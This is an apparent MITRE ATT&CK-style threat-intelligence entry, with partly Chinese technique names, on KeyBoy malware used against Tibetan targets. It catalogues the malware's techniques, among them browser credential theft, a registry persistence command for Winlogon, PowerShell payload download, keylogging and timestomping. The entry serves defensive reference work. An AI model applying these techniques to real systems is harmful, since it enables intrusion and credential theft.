1. Home
  2. Software
  3. KeyBoy

KeyBoy

KeyBoy is malware that has been used in targeted campaigns against members of the Tibetan Parliament in 2016.[1][2]

ID: S0387
Type: MALWARE
Platforms: Windows
Version: 1.3
Created: 14 June 2019
Last Modified: 18 April 2024
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1555 .003 从密码存储中获取凭证: Credentials from Web Browsers

KeyBoy attempts to collect passwords from browsers.[3]
Enterprise T1543 .003 创建或修改系统进程: Windows Service

KeyBoy installs a service pointing to a malicious DLL dropped to disk.[3]
Enterprise T1547 .004 启动或登录自动启动执行: Winlogon Helper DLL

KeyBoy issues the command reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" to achieve persistence.[2] [1]
Enterprise T1059 .001 命令与脚本解释器: PowerShell

KeyBoy uses PowerShell commands to download and execute payloads.[2]
.003 命令与脚本解释器: Windows Command Shell

KeyBoy can launch interactive shells for communicating with the victim machine.[2][3]
.005 命令与脚本解释器: Visual Basic

KeyBoy uses VBS scripts for installing files and performing execution.[1]
.006 命令与脚本解释器: Python

KeyBoy uses Python scripts for installing files and performing execution.[1]
Enterprise T1113 屏幕捕获

KeyBoy has a command to perform screen grabbing.[2]
Enterprise T1001 .003 数据混淆: Protocol or Service Impersonation

KeyBoy uses custom SSL libraries to impersonate SSL in C2 traffic.[2]
Enterprise T1083 文件和目录发现

KeyBoy has a command to launch a file browser or explorer on the system.[2]
Enterprise T1027 .013 混淆文件或信息: Encrypted/Encoded File

In one version of KeyBoy, string obfuscation routines were used to hide many of the critical values referenced in the malware.[1]
Enterprise T1070 .006 移除指标: Timestomp

KeyBoy time-stomped its DLL in order to evade detection.[2]
Enterprise T1082 系统信息发现

KeyBoy can gather extended system information, such as information about the operating system, disks, and memory.[2][3]
Enterprise T1016 系统网络配置发现

KeyBoy can determine the public or WAN IP address for the system.[2]
Enterprise T1105 输入工具传输

KeyBoy has a download and upload functionality.[2][3]
Enterprise T1056 .001 输入捕获: Keylogging

KeyBoy installs a keylogger for intercepting credentials and keystrokes.[3]
Enterprise T1559 .002 进程间通信: Dynamic Data Exchange

KeyBoy uses the Dynamic Data Exchange (DDE) protocol to download remote payloads.[2]
Enterprise T1564 .003 隐藏伪装: Hidden Window

KeyBoy uses -w Hidden to conceal a PowerShell window that downloads a payload. [2]

Groups That Use This Software

ID Name References
G0081 Tropic Trooper

[4][5]

References

  1. Hulcoop, A., et al. (2016, November 17). It’s Parliamentary KeyBoy and the targeting of the Tibetan Community. Retrieved June 13, 2019.
  2. Parys, B. (2017, February 11). The KeyBoys are back in town. Retrieved June 13, 2019.
  3. Guarnieri, C., Schloesser M. (2013, June 7). KeyBoy, Targeted Attacks against Vietnam and India. Retrieved June 14, 2019.
  1. Ray, V. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved November 9, 2018.
  2. Alexander, G., et al. (2018, August 8). Familiar Feeling: A Malware Campaign Targeting the Tibetan Diaspora Resurfaces. Retrieved June 17, 2019.